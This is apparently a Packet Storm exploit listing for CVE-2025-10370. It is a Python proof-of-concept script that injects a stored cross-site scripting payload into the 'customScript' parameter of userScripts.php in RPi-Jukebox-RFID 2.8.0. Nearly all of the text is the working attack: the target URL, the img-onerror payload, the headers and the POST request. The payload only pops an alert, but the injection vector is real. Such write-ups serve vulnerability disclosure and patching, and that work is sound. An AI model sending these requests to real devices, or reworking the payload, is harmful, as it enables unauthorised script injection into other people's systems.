Share
## https://sploitus.com/exploit?id=PACKETSTORM:215037
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
    # Date: 2025-09-25
    # Exploit Author: Beatriz Fresno Naumova
    # Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
    # Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
    # Version: 2.8.0
    # Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
    # CVE: CVE-2025-10370
    #
    # Description:
    # This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
    # The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
    # of arbitrary JavaScript payloads.
    
    import requests
    
    # Change this to the actual IP or hostname of the target device
    TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"
    
    # The XSS payload
    PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'
    
    # HTTP headers
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": TARGET,
    }
    
    # POST data with the malicious payload
    data = {
        "customScript": PAYLOAD
    }
    
    def send_exploit():
        print(f"[+] Sending XSS payload to {TARGET}")
        try:
            r = requests.post(TARGET, headers=headers, data=data, timeout=5)
            print(f"[+] Payload sent. Status code: {r.status_code}")
            print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
        except Exception as e:
            print(f"[-] Exploit failed: {e}")
    
    if __name__ == "__main__":
        send_exploit()